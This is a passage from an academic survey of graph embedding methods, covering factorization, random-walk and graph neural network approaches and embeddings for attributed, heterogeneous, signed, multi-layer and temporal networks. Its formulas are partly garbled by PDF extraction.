graph embeddings under efficiency constraints over time and memory. Today, there exists a large variety of graph embeddings automatically extract vector representation for networks (Moyano, 2017; Hamilton, Ying & Leskovec, 2017b; Cai, Zheng & Chang, 2017; Cui et al., 2018; Goyal & Ferrara, 2017; Chen et al., 2018a; Wu et al., 2019b), knowledge graphs (Nickel et al., 2016) and biological data (Su et al., 2020). Some of these algorithms only work with structural information, such as popular Node2vec (Grover & Leskovec, 2016), LINE (Tang et al., 2015), DeepWalk (Perozzi, Al-Rfou & Skiena, 2014), while others like GCN (Kipf & Welling, 2016a), GraphSAGE (Hamilton, Ying & Leskovec, 2017a), VGAE (Kipf & Welling, 2016b) also use node attributes. The methods also differ based on whether a given graph is (un)directed, (un)weighted, (non-)attributed, (dis)assortative, if it changes over time in terms of adding/deleting nodes/edges, and whether they use a transductive or inductive approach for learning network dynamics inference. All of these models have their advantages and shortcomings, but what unifies them is the unique pipeline to verify the network embedding model in terms of the quality Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 2/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ of machine learning tasks on benchmark datasets. In addition, authors measure construction and inference time efficiency, memory consumption, and a possibility to include graph dynamics in the model. Most surveys on graph embeddings provide a simple taxonomy for graph models based on how the model is fitted and only show applications within the graph domain, for example, node classification or link prediction (Moyano, 2017; Hamilton, Ying & Leskovec, 2017b). Goyal & Ferrara (2017) provide experiments and study the influence of hyperparameters on different tasks. Some works focus on a specific field such as attention models (Lee et al., 2019) and graph neural networks (Wu et al., 2019b; Chen et al., 2018a; Zhang, Cui & Zhu, 2018). Cui et al. (2018) compare models in terms of what information they preserve: structure and properties or side information. Neural network approaches are usually classified by the core architecture, for example, recurrent neural networks (RNN) or convolutional neural networks (CNN), and losses for different tasks, such as cross-entropy for link prediction and node classification and reconstruction loss for unsupervised representation learning. Chen et al. (2018a) provides meta-strategies for choosing embedding models, but examine only deep learning based methods. Lee et al. (2019) follow the classification of Cai, Zheng & Chang (2017) and separate attention models by type of input and output, deriving recommendations for working with different graphs (heterogeneity, multi-view, directed acyclic graphs) and on different tasks (node classification, clustering, ranking, alignment, link prediction). Zhang, Cui & Zhu (2018) is quite similar to other GNN surveys, but also provides an overview of modern models and tasks like reinforcement learning on graphs, analyses techniques for better representation learning like sampling strategies, skip connections, inductive learning and adversarial training. In contrast, our work tries to generalize the advances of previous surveys. Our survey is not limited to specific model types and provides an overview from different angles: training process, input graph properties, specific tasks and applications in a non-graph domain, and open problems, etc. The paper is structured as follows. We start with a brief explanation of general approaches to learn network embedding and introduce to a reader the core ideas of graph representation models. Next, we describe different models adapted to specific types of networks. Then, we state the most crucial machine learning problems on graphs and solutions to them based on network embeddings. To cover the use of overviewed models, we provide applications to other machine learning domains. We finalize review sections with the listing of open problems in the field of network representation learning. Finally, we provide our experiments to understand in practice, how different graph embeddings perform on benchmark network datasets and interpret, why the chosen graph embedding model with a given training setting result in good or bad quality on a given benchmark dataset and how it is related to the method behind the model. Our experiment section aims to show how one can choose the best graph embedding by the nature of the model construction and network descriptive statistics, which is one the most interesting problems for practical applications of graph embeddings for machine learning frameworks. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 3/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ PRELIMINARIES Before describing any methods we need to introduce some definitions. We will use V as a set of graph vertices, E as a set of graph edges, A as graph adjacency matrix and G(V, E) as graph description. The procedure on constructing vector representation of a graph we are interested in is called graph embedding. Definition 1 (Graph embedding) is a mapping from a collection of substructures (most commonly either all nodes, or all edges, or certain subgraphs) to Rd. We will mostly consider node embeddings: f : V ! Rd; d � jVj. For many graph-based tasks, the most natural task formulation is unsupervised learning: this is the case when we need to learn embeddings using only the adjacency matrix A containing information on structural similarity and possibly attributed features X, but without task-specific loss part. It is also possible that there are labels available for some substructures of the graph, and we wish to recover missing labels in a semi-supervised approach. One example of this is node classification, in which all nodes are available from the outset, but only a fraction is labeled. Now let us clarify what is meant by a good embedding. By the embedding procedure, one should aim to compress the data, while retaining most of the essential information about similarities and simultaneously, extract important features from the structural information. What counts as essential may vary depending on an intended application; most common properties we want to capture in a graph are termed as node proximity and structural similarity (neighbourhood information and structural role, respectively). Definition 2 (First and second order proximities) The first-order proximity describes the pairwise proximity between vertices. For any vertices, the weight aij (possibly zero) of the edge between vi and vj characterizes the first-order proximity between these vertices, thus representing adjacency matrix A ¼ ðaijÞni;j¼1. A neighborhood of vertex vi is defined as a set of adjacent vertices Nvi ¼ fvkjaik > 0; k 6¼ ig thus meaning that vertex itself is not included in its neighborhood. The second-order proximity between a pair of vertices vi and vj describes the similarity measure between their neighborhood structures Nvi and Nvj with respect to a selected proximity measure. METHODS FOR CONSTRUCTING GRAPH EMBEDDING We briefly describe graph embedding methods of three general categories, corresponding to the perspective they take on embedding graphs: matrix factorizations, node sequence methods and deep learning based methods. These are, of course, not mutually exclusive, but it is more convenient to adhere to their primary features. We also cover a specific type of embeddings based on embedding space metric. We select papers from several curated lists and major conferences on network science, artificial intelligence, machine learning and data mining, as well as core research publishers and indexing services. Paper sources are referred in Table 1. We used the following keywords: graph/network embeddings, graph/network representation, graph neural networks, graph convolutional networks, graph convolution, graph attention, Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 4/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ graph/network classification/link prediction/clustering, deep learning for graphs, geometric deep learning, GCN, GNN, GAT. Historically the first graph embedding methods were factorization based, which generally try to approximate a large matrix with a low-rank matrix factorized into a product of two matrices containing representations, thus modeling each entry of the original matrix with an inner product of representations. Sequence-based embeddings linearize the graph using random walks or diffusion and maximize the probability of observing the neighborhood (context) of a node given its embedding. Deep learning-based models learn a function mapping a graph in the numeric form to a low-dimensional embedding by optimizing over a broad class of expressive neural network functions. Dimensionality reduction (matrix factorization) methods Definition 3 (Matrix factorization) is a decomposition of a matrix to the product of matrices. In this sense, the first matrix in series is named self node representation and the last matrix refers to node context. Table 1 Paper sources. Name Link Description Curated lists by Chen https://github.com/chihming/ awesome-network-embedding by Rozemberczki https://github.com/benedekrozemberczki/ awesome-graph-classification by Rebo https://github.com/MaxwellRebo/ awesome-2vec by Soru https://gist.github.com/mommi84/ awesome-kge Conferences Complex Networks https://complexnetworks.org/ International Conference on Complex Networks and their Applications The Web https://www2020.thewebconf.org/ The Web Conference is international conference on the World Wide Web. WSDM http://www.wsdm-conference.org/ Web-inspired research involving search and data mining IJCAI https://www.ijcai.org/ International Joint Conferences on Artificial Intelligence AAAI https://www.aaai.org/ Association for the Advancement of Artificial Intelligence ICML https://icml.cc/ International Conference on Machine Learning SIGKDD https://www.kdd.org/ Special Interest Group in Knowledge Discovery and Databases Domain conferences ACL http://www.acl2019.org/ Association for Computational Linguistics CVPR http://cvpr2019.thecvf.com/ Conference on Computer Vision and Pattern Recognition Publishers ACM DL https://dl.acm.org/ Full-text articles database by Association for Computing Machinery IEEE Xplore https://ieeexplore.ieee.org/Xplore/home.jsp Research published by Institute of Electrical and Electronics Engineers Link Springer https://link.springer.com/ Online collection of scientific journals, books and reference works Indexing services Scopus https://www.scopus.com/ Abstract and citation database Web of Science https://www.webofknowledge.com/ Citation Indexer Scholar Google https://scholar.google.com/ Web search engine for indexing full-text papers or its metadata Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 5/62 https://github.com/chihming/ https://github.com/benedekrozemberczki/ https://github.com/MaxwellRebo/ https://gist.github.com/mommi84/ https://complexnetworks.org/ https://www2020.thewebconf.org/ http://www.wsdm-conference.org/ https://www.ijcai.org/ https://www.aaai.org/ https://icml.cc/ https://www.kdd.org/ http://www.acl2019.org/ http://cvpr2019.thecvf.com/ https://dl.acm.org/ https://ieeexplore.ieee.org/Xplore/home.jsp https://link.springer.com/ https://www.scopus.com/ https://www.webofknowledge.com/ https://scholar.google.com/ http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Factorization models are common techniques in different machine learning domains to receive meaningful low-dimensional representation. Moreover, a lot of methods use similarity matrix between observations, which can also be reformulated as the graph similarity matrix. Factorization techniques can be applied to a different graph representations and optimize different objectives. Some methods directly decompose the adjacency matrix A, for example, MDS (Kruskal & Wish, 1978) reconstructs it by minimizing MSE between element aij and euclidean distance between vectors ui and uj of manifold U. We can rewrite this with expression PN i¼1 PN j¼1 aij � kui � ujk22 � �2 . LSI (Deerwester et al., 1990) simply applies singular value decomposition to A Golub & Reinsch (1971). In Wold, Esbensen & Geladi (1987) the manifolds are learned by maximizing variance for linear mixture. It is extended by LDA Martinez & Kak (2001). Another way to use dimensionality reduction is to build proximity matrix of the graph. For example, IsoMap (Tenenbaum, De Silva & Langford, 2000) use shortest path matrix D and apply MDS to learn embeddings. LLE (Roweis & Saul, 2000) learns node similarity by reconstructing weights matrix W with which neighboring nodes affect each other: kX � WTUk22 and repeats that procedure to learn manifold U with achieved matrix W. LPP (He & Niyogi, 2004) estimates the weighted matrix W as heat kernel and learn manifold U by reduction of W with Laplacian Eigenmaps technique. IsoMap and LLE were proposed to model global structure while preserving local distances or sampling from the local neighborhood of nodes. The lower bound for methods complexity was quadratic in the number of vertices, still making them inappropriate for large networks. Definition 4 (Graph Laplacian) If matrix D is the diagonal degree matrix, that is D ¼ diagð�jAijÞ, then Laplacian matrix can be defined as L = D − A. Another approach for spectral graph clustering (Chung & Graham, 1997) was suggested in Belkin & Niyogi (2002) named Laplacian eigenmaps (LE), representing each node by graph Laplacian eigenvectors associated with its first k nontrivial eigenvalues. The goal for Laplacian Eigenmaps class of models lies in preserving first-order similarities. Thus, a model gives a larger penalty using graph Laplacian if two nodes with larger similarity are embedded far apart in the embedding space. Laplacian objective function is symmetric in each pair (i, j), and thus it cannot capture edge orientations. Kernel Eigenmaps (Brand, 2003) extends this approach to nonlinear cases. In contrast to LE, which preserved nodes dissimilarity, Cauchy embedding (Luo et al., 2011) proposes optimization condition modification which preserves the similarity between vertices. Structure Preserving Embedding (SPE) (Shaw & Jebara, 2009) aims to use LE combined with preserving spectral decomposition representing the cluster structure of the graph. It introduces a new graph kernel and applies SVD to it. Graph Factorization (GF) (Ahmed et al., 2013) try to solve the scalability issue of factorization methods by decreasing node neighborhood via graph partitioning and utilizing distributed computation. The models in this class can be either symmetric and obtain final representations only from embedding matrix. GraRep (Cao, Lu & Xu, 2015) consider k-hop neighborhood (Ak) Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 6/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ using SVD decomposition of Ak. HOPE (Ou et al., 2016) is specific asymmetric transitivity preserving graph embedding. It is found that most asymmetric similarity measures can be formulated as S ¼ M�1g Ml. Katz index refers to Mg = I − βA, Ml = βA. Rooted PageRank can be stated as Mg = I − αP, Ml = (1 − α) P. Common neighbors is represented by Mg = I, Ml = A 2, and Adamic-Adar with Mg = I, Ml = A· D· A. To avoid calculation of similarity matrix authors propose to use generalized SVD and directly estimate matrices Mg and Ml. Abu-El-Haija, Perozzi & Al-Rfou (2017) proposed to use concatenation of two node representations capturing in- and out-connections. Authors of Wang et al. (2017d) proposed a Modularized Nonnegative Matrix Factorization (M-NMF) model to preserve the community structure in network representation. In ATP model (Sun et al., 2019) authors embed directed graph constructing two vectors for each node via factorization framework. Kefato, Sheikh & Montresor (2020) propose multi-objective framework for preserving directed nature of graph. SDNE (Wang, Cui & Zhu, 2016) uses autoencoders (as neural network based dimension reduction technique) to capture non-linear dependencies in local proximity. Factorization based models are the best-studied theoretically and provide a well-known general framework for graph embedding optimization (Liu et al., 2019), however, they suffer from high computational complexity for large graphs and often capture only a small-order proximity Perozzi, Al-Rfou & Skiena (2014). Sequence-based approaches Definition 5 (Random walk on graph) is a sequence of nodes obtained from the random process of node sampling. Usually, probability of choice of node j after node i is proportional to Ai,j. Motivated by drawbacks of the matrix factorization approach, another approach emerged that attempts to preserve local neighborhoods of nodes and their properties based on random walks (Newman, 2005; Pirotte et al., 2007). More specifically, the main idea is to maximize the probability of observing the neighborhood of a node given its embedding, following the line of Skip-gram model initiated in NLP applications by Mikolov et al. (2013), Pennington, Socher & Manning (2014). An objective of this type can be efficiently optimized with stochastic gradient descent on a single-layer neural network, and hence has lower computational complexity. Definition 6 (Skip-gram) is method to learn sequence element i representation via maximization of probability of elements in context of i based on representation of i. Two prominent examples of models in this class are node2vec (Grover & Leskovec, 2016) and DeepWalk (Perozzi, Al-Rfou & Skiena, 2014). DeepWalk performs a random walk over a graph and then uses sampled sequences to learn embeddings, using the Skip-gram objective (while having modifications for other NLP based sequence models, such as using Glove from Brochier, Guille & Velcin (2019)). Its predecessor LINE (Tang et al., 2015) is equivalent to DeepWalk when the size of vertices’ contexts is set Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 7/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ to one. Node2vec extends the random walk with biasing parameters of BFS or DFS parameters. Another way of sampling based on diffusion was presented in diff2vec (Rozemberczki & Sarkar, 2018). By virtue of sampling being more centered around source nodes, it provides robust embeddings while being less flexible. Walklets (Perozzi, Kulkarni & Skiena, 2016) as a generalization of GraRep (Cao, Lu & Xu, 2015) use weighted combination of embeddings of powers of adjacency matrix A, A2, …, Ak to reduce the bias of Deepwalk for low-order proximities, and approximates computing Ai by skipping nodes using short random walks (Perozzi et al., 2017). The focus on the local structure and non-convex optimization requiring the use of stochastic gradient descent and proper initialization limit random walk based methods in capturing the hierarchical structure of a graph. HARP (Chen et al., 2018b) proposes a meta-strategy for graph embedding under recursive construction of nodes and edges into condensed graphs with similar global structure. These graphs are used as source initializations for embedding detailed graphs, resulting in the end in proper node and edge embeddings, which can be adopted for improving DeepWalk (Perozzi, Al-Rfou & Skiena, 2014), LINE (Tang et al., 2015), and Node2vec (Grover & Leskovec, 2016) algorithms. It was further generalized for community preserving using Modularity Maximization (Tang & Liu, 2009) and supporting large free-scale networks (Feng et al., 2018). Alternatively, Struct2vec (Ribeiro, Saverese & Figueiredo, 2017) uses structural similarity without using node or edge attributes but considering graph hierarchy to measure similarity at different scales. Liu et al. (2020c) uses rooted substructures of a graph to preserve structural similarity. Diffusion wavelet model to capture structural proximity was suggested in Donnat et al. (2018). Another approach to control hyper-parameters in random-walk methods is Graph Attention (Abu-El-Haija et al., 2018) learning multi-scale representation over adjacency matrix powers with the probabilistic approach for learning balancing weights for each power. It was further generalized to its deep learning analog in Veličković et al. (2017) and Liu et al. (2018a), see also Lee et al. (2019) for details on attention models on graphs. Extension of Deepwalk to heterogeneous networks was suggested in Metapath2vec (Dong, Chawla & Swami, 2017). Modifications of random-walk based methods using node attribute concepts and node proximities were suggested in GenVector (Yang, Tang & Cohen, 2016b). With GEMSEC (Rozemberczki et al., 2018), the authors extend sequence-based methods with additional K-means objective encouraging clustering structure-preserving in the embedding space and improving overall performance. Discriminative Deep Random Walk (DDRW) (Li, Zhu & Zhang, 2016) was suggested for the task of attributed network classification. Çelikkanat & Malliaros (2019) generalizes random walk based methods to the case of the exponential family of distributions for sampling strategies. Sequence-based models, such as node2vec, can obtain high-quality embeddings of structural input graph by sampling node sequences and learning context-consistent embeddings but are not able to capture additional node/edge features while being transductive by their nature. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 8/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Deep learning: graph convolutions Complex non-regular graphs structure makes graph filtering not as simply defined as on images. In the past decades, researchers have been working on the graph signal processing methods including filtering, wavelets, Fourier transformations using graph spectral domain. The studies on these methods can be found in Shuman et al. (2013), Ortega et al. (2018a). Advances in deep learning have led to a new field of studies devoted to applying neural networks to graph data (Scarselli et al., 2009; Li et al., 2014a, 2014b). Recently, SDNE (Wang, Cui & Zhu, 2016) and DNGR (Cao, Lu & Xu, 2016) use deep autoencoder to capture non-linearity in graphs and simultaneously apply dimension reduction for constructing graph embedding. SDNE use autoencoder preserving first order proximity and Laplacian Eigenmaps for penalizing long distances for embedding vectors of similar vertices. DGNR uses stacked denoising autoencoders over positive pointwise mutual information matrix obtained from similarity information based on random surfing. Both methods use global information and thus are not appropriate for large networks. Kipf & Welling (2016a) propose Graph Convolutional Layer that offers a further simplified approximation to spectral convolution and achieves better computational efficiency for semi-supervised multi-class node classification is applicable for the other machine learning tasks. A model of several such convolutions is referred to as Graph Convolutional Network (GCN). Improvements over speed and optimization methods of training GCNs were suggested in Chen, Zhu & Song (2017), Chen, Ma & Xiao (2018). Stochastic approaches for network embedding optimization were briefly over-viewed in Lei, Shi & Niu (2018). Assume the graph G(V,E), adjacency matrix A and feature matrix X of size (Nnodes, Nfeatures), where Nnodes refers to number of vertices and Nfeatures to number of node attributes. Then, GCN can be defined as set of hidden layers Hi = σ(AHi−1 Wi−1) where H0 is equal to matrix X, Wi is learnable weight matrix. At the next hidden layer, these features are aggregated using the same propagation rule. It means that graph convolutions aggregate feature information of its neighbors based on the adjacency matrix. The idea of graph convolutions using spatial convolutions (operating with adjacency matrix) or spectral graph methods (operating with graph Laplacian) was proposed in Bruna et al. (2013), Duvenaud et al. (2015), Henaff, Bruna & LeCun (2015), Niepert, Ahmed & Kutzkov (2016), Defferrard, Bresson & Vandergheynst (2016), Levie et al. (2017), while extending the GCN idea to recurrent models Li et al. (2015c), Monti, Bronstein & Bresson (2017), mixture models of CNNs Monti et al. (2017); Fey et al. (2018), diffusion convolutions Atwood & Towsley (2016); Li et al. (2017c), and models suitable for dynamic graphs under inductive learning paradigm Natarajan & Dhillon (2014); Hamilton, Ying & Leskovec (2017a). All the methods suggest semi-supervised embedding, however, choosing unique labels for each vertex one may obtain an unsupervised version of network embedding. The GraphSAINT (Zeng et al., 2019) provides a solution for scalability problem in training graph neural networks. It compares different topology-based sampling algorithms Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 9/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ (node, edge and random walks) in terms of bias and variance of learned GCN model. It also introduces unbiased estimator for node aggregation. Another idea is to use deep autoencoders to learn compressed representations that capture the essence of the graph structure. An autoencoder includes two nonlinear functions, an encoder and a decoder, and attempts to minimize reconstruction loss. One such model specifically designed for graphs is GAE, which consists of a GCN encoder (one or two stacked GCN layers in most use cases) that produces embeddings and an inner product decoder that reconstructs the adjacency matrix (Â ¼ rðUUTÞ, where σ is non-linearity like sigmoid function and U is embedding matrix of nodes). The weights of the model are trained by backpropagating the reconstruction loss, which is usually Mean Squared Error (MSE). VGAE (Kipf & Welling, 2016b) is a probabilistic counterpart of GAE. It introduces a distribution over latent variables Z, with these variables being conditionally independent Gaussians given A and X with means (μ) and diagonal covariances (σ) being parameterized by two GCN encoders (Kingma & Welling, 2013). As in the case of images, VGAE just adds KL-divergence term between conditional distribution q(Z|X,A) and unconditional p(Z) ∼ N(0,1) to the loss. After node embeddings are reconstructed via random normal distribution sampling, that is, Z = μ + σε. Then adjacency matrix is decoded using inner product of achieved vector Z as in simple GAE. In very recent work, authors of GraphSAGE (Hamilton, Ying & Leskovec, 2017a) offer an extension of GCN for inductive unsupervised representation learning and offer to use trainable aggregation functions instead of simple convolutions applied to neighborhoods in GCN. GraphSAGE learns aggregation functions for a different number of hops that are applied to sampled neighborhoods of different depths, which then are used for obtaining node representations from initial node features. PinSage (Ying et al., 2018a) extends the previous algorithm with the importance sampling based on random walks. Importance score is calculated simply as visit counts. It provides better scalability and quality. GAT (Veličković et al., 2017) use masked self-attention layers for learning weights balancing impact of neighbors on node embedding, and supporting both, inductive and transductive learning settings. In Liu et al. (2018a), authors suggested specific layers controlling the aggregation of the local neighborhood over BFS and DFS sampling, thus generalizing Node2vec (Grover & Leskovec, 2016) model to graph neural networks. Similar to GCN, GAT contains several hidden layers Hi = f(Hi − 1, A), where H0 is a graph node features. In each hidden layer linear transformation of input is firstly calculated with the learnable matrix W. The authors replace the adjacency matrix by learnable self-attention in form of a fully-connected layer with activation and further normalization with softmax. Generalization of gated recurrent graph neural networks (Li et al., 2015c) was suggested in Message Passing Neural Network (MPNN) (Gilmer et al., 2017) providing a differentiable way to combine information from neighbours. Nowadays, many advanced deep neural network models are adapted to graph data. Graph generative adversarial networks were suggested in Ding, Tang & Zhang (2018) and Yu et al. (2018). In You et al. (2018), recurrent graph neural network was suggested for the task of graphs generation. Pooling operators for graphs were used in Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 10/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Defferrard, Bresson & Vandergheynst (2016), Ying et al. (2018b). Yuan & Ji (2020) modernize classic pooling to account graph structure using Conditional Random Fields. Adversarially regularized variational graph autoencoder (ARVGA) was suggested in Pan et al. (2019). Zhu et al. (2020a) develop the DGGAN model that jointly learns source and target vectors for the directed graphs employing adversarial techniques. Liu (2020) builds Anonymized GCN with adversarial training to be robust to the noise attacks. Hettige et al. (2020) propose the RASE model, that applies Gaussian denoising attribute autoencoder for achieving robustness of received embedding, while Laakom et al. (2020) catches the uncertainty by learning probability Gaussian distributions over embedding space. Weng, Zhang & Dou (2020) employs adversarial training for variational graph autoencoder. Zhu et al. (2020b) use node feature smoothing for learn better embeddings. Jing et al. (2020) designs variable heat kernel to learn robust representations. Deep Learning models are now a study of vulnerability to adversarial attacks, in particular, it relates to structural data. The first approaches for detection of node/edge add/remove mechanisms were studied in Bojcheski & Günnemann (2018), Chen et al. (2018c), while other researchers focused on methods for unsupervised (Sun et al., 2018b), semi-supervised (Chen et al., 2018e) and supervised (Zügner, Akbarnejad & Günnemann, 2018) scenarios of graph embedding construction, and application for ML problems. The black-box approach was formulated in Dai et al. (2018) and further covered in general overview for the problem of graph data poisoning (Chen et al., 2019b) and its applications to social media data (Zhou et al., 2018) and knowledge graphs (Zhang et al., 2019b). A survey of methods for defense from adversarial attacks on graphs was suggested in Sun et al. (2018a). The deep learning models propose a new way of approximation for classic graph convolutions and kernels, which allows extracting embeddings faster. A mixture of it with semi-supervised techniques gives the state-of-the-art results in terms of scalability, speed and quality on downstream tasks. Hyperbolic (non-Euclidean) embeddings The Euclidean space is not the best for structures like graphs, because has the low descriptive ability for hierarchical and scale-free structures. So, researchers have considered other space, that can successfully represent it in a comparatively low number of dimensions, saving the basic properties like angles. It allows using classical machine learning methods in down-streamed tasks. In certain cases, embedding into non-Euclidean spaces may be beneficial for model performance (Kleinberg, 2007; Shavitt & Tankel, 2008; Krioukov et al., 2009). LEs were also used for constructing embedding in hyperbolic space (Alanis-Lobato, Mier & Andrade- Navarro, 2016). Deep learning approach was applied for hyperbolic embedding in Chamberlain, Clough & Deisenroth (2017). There is no exact research on the properties of embedding spaces, but researchers mostly pay attention to preserving low dimensional space, catching graph properties and model quality trade-off. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 11/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ SPECIFIC EMBEDDINGS BASED ON NETWORK TYPES In this section, we show specific embedding models generalizing core methods of network representation to a certain domain of networks and applications based on the network type. Attributed networks Real-world networks are often accompanied with additional features for nodes and edges, such as labels, texts, images. These attributes tend to be correlated for close graph structures and could affect network embedding by adding additional information for the similarity of nodes. The attributes are usually represented by high-dimensional vectors of features (which are sparse for just label attributes). Once the attributes are represented by their embeddings, the task is to incorporate them in network embedding model (under unsupervised or semi-supervised framework). The authors of TADW (Yang et al., 2015) represent DeepWalk model as matrix factorization and incorporate text attributes into factorization framework. PLE (Ren et al., 2016) jointly learns the representations of entity types and links together with text features. In Le & Lauw (2014), a generative model for document network embedding was suggested based on topic modeling of documents using Relational Topic Model (RTM) (Chang & Blei, 2009) and the relationships between the documents. In Ganguly et al. (2016), authors combine text and network features for co-authorship recommendations. Augmented Relation Embedding (ARE) (Lin, Liu & Chen, 2005) adds content-based features for images using graph-Laplacian spectral embedding modification. In Geng et al. (2015), Zhang et al. (2015, 2017), authors suggested to embed images, textual and network information for modeling user-image interaction. In addition to structural similarity, in certain cases feature similarity may be also important. Two-layered network embedding for node-to-node and text-to-text similarities was suggested in Sun et al. (2016). In Zhang et al. (2016b), the authors proposed the HSCA model, embedding homophily, network topological structure and node features simultaneously. In DeepBrowse (Chen, Anantharam & Skiena, 2017), the authors suggested using DeepWalk-based node similarity together with priority ranking for recommender system based on an interaction graph. Label preserving attribute node embedding was suggested in Tri-party Deep Network Representation (Pan et al., 2016). Modifications of random-walk based methods using node attribute concepts and node proximities were suggested in GenVector (Yang, Tang & Cohen, 2016b). Label attributes are also an important part for such problems as classification of nodes and edges, or community information (assigning each node a community label). Community preserving network embeddings were suggested in Shaw & Jebara (2009), Wang et al. (2017d) and Rozemberczki et al. (2018). Incorporating group information was presented in GENE model (Chen, Zhang & Huang, 2016b) under a supervised framework. Semi-supervised frameworks for learning network embedding under loss constraints for labeled data were suggested in Planetoid (Yang, Cohen & Salakhutdinov, 2016a) Max-margin Deep Walk (Tu et al., 2016) and LANE (Huang, Li & Hu, 2017). Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 12/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Heterogeneous networks A heterogeneous network presents a different concept of graph representation, in which nodes and edges may have different types (or even multiple edges). The heterogeneous network embeddings either learn embeddings in the same vector space (Li, Ritter & Jurafsky, 2015; Zhao, Liu & Sun, 2015), or construct the embeddings separately for each modality and then aggregate them into one space, such as HNE model (Chang et al., 2015) and Tang & Liu (2011), or even aggregate over multiple network layers (Xu et al., 2017) or different relation features (Huang, Li & Hu, 2017). Random-walk based approach for different node types based on DeepWalk was presented in Metapath2vec (Dong, Chawla & Swami, 2017). Similar approaches based on meta-path random walks for graph embedding were suggested in Huang & Mamoulis (2017), Chen & Sun (2017). Jacob, Denoyer & Gallinari (2014) use heterogeneous network embedding for node classification across different node types. A similar problem was posed for author identification on double-blind review scenario (Chen & Sun, 2017). Study by Jiang et al. (2020) provides a framework for efficient task-oriented skip-gram based embeddings. Hu, Fang & Shi (2019) utilizes the generative adversarial networks, which learn node distributions for efficient negative sampling. Shi et al. (2020) proposes a method for automatic meta-path construction. Cao et al. (2020) use the graph attention mechanism for heterogeneous graph embedding task. MAGNN architecture (Fu et al., 2020) extends simple attention mechanism with several levels: node attributes, inter meta-path information and intra meta-path semantic information. DyHAN (Yang et al., 2020) presents the model for dynamic heterogeneous graphs with hierarchical attention. Another way to use the attention mechanism in dynamic heterogeneous networks is the Li et al. (2020b). It employs three types of attention: structural, semantic and temporal. Heterogeneous graph embeddings are widely used in real-world applications. Hong et al. (2020) estimates the arrival time for transportation networks, Ragesh et al. (2020) use it in text classification. Chen & Zhang (2020), Li et al. (2020a) utilizes HIN embedding for multi-modal data fusion task. Zhang et al. (2020a) preserves the relationships in HIN. A survey on heterogeneous networks can be found in Wang et al. (2020a). Signed networks In a signed network, each edge is associated with its weight, taking values from the set {1, − 1}, which usually represents belief or opinion sentiment for different relations types. These networks are specifically considered apart from Heterogeneous networks as important objects for social network analysis, although they are still just a specific type of such networks. One of the tasks on such networks is predicting links and their signs (Liu et al., 2015a). SiNE (Wang et al., 2017c) is a DNN model aiming at close relationships with friends (positive weight) rather than with foes (negative weight). For highly positive social networks a virtual node with negative relation is proposed to use in the model, which uses pairwise similarities optimization under constraint mentioned above. In Yuan, Wu & Xiang (2017), the authors propose a local neighborhood aggregation model SNE for each Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 13/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ type of positive and negative relations. Kim et al. (2018) propose random-walks based model SIDE for signed directed networks. Also, they provide socio-psychological interpretation for each term in the loss function. SIGnet (Islam, Prakash & Ramakrishnan, 2018) develops new target node sampling for more efficient learning. In oppose to previous works, Lu et al. (2019) provides signed network embedding powered by Status Theory (Leskovec, Huttenlocher & Kleinberg, 2010). It natively works with directed networks by preserving node ranking except direct node similarity. Multi-layer networks Multi-layer networks are used to model complex systems with different levels of interaction between nodes, for example, whole Airline network with different carriers. Each layer in such networks corresponds to different types of relationships. Liu et al. (2017a) compare three aggregation methods for single-layer network embedding models: merging of different layers in one network, single-layer vectors concatenation and between-layer random walks. The best results show the last method named layer co-analysis because it allows learning between-layer interactions. In Xu et al. (2017) authors provide an example of coupling into joint space two separately learned heterogeneous networks embeddings. IONE (Liu et al., 2016) preserves users similarity based on their followers and followees for several social networks. A hierarchy-aware unsupervised node feature learning approach for multi-layer networks was proposed in Zitnik & Leskovec (2017). In Li et al. (2018) authors develop the single optimization framework for both within-layer and between-layer communication. It exploits spectral embedding and the block model. Temporal networks A lot of real-world networks are evolving over-time. Most of the described above methods concentrate on the static embeddings, so it works poorly in the temporal scenario. Haddad et al. (2019) propose the adaptation of Node2vec model to the dynamic case. Authors also introduce the task-specific temporal embeddings. Rossi et al. (2020a) provide the generic framework named Temporal Graph networks for deep learning on dynamic graphs. Fathy & Li (2020) apply the graph attention to the temporal networks. Zhong, Qiu & Shi (2020) develop the model for efficient community mining. Rokka Chhetri & Al Faruque (2020) present the model for dynamic physics graphs. CTGCN model (Liu et al., 2020a) generalizes graph convolution networks with feature transformation and aggregation. It builds the hierarchical representation of the graph with K-cores and applies GCN to it. Goyal, Chhetri & Canedo (2020) use the recurrent neural networks to catch the dynamics. There is one more specific graph type: temporal interaction networks, such as user-item interactions in the recommender systems. Zhang et al. (2020b) creates the embedding approach for such graph utilizing coupled memory networks. Nowadays, methods based on smart neighborhood aggregation, such as limiting random walks over clusters Chiang et al. (2019) and precomputing diffusion-based neighborhoods for one-layer GCN Rossi et al. (2020b) show great performance over existing approaches, thus combining 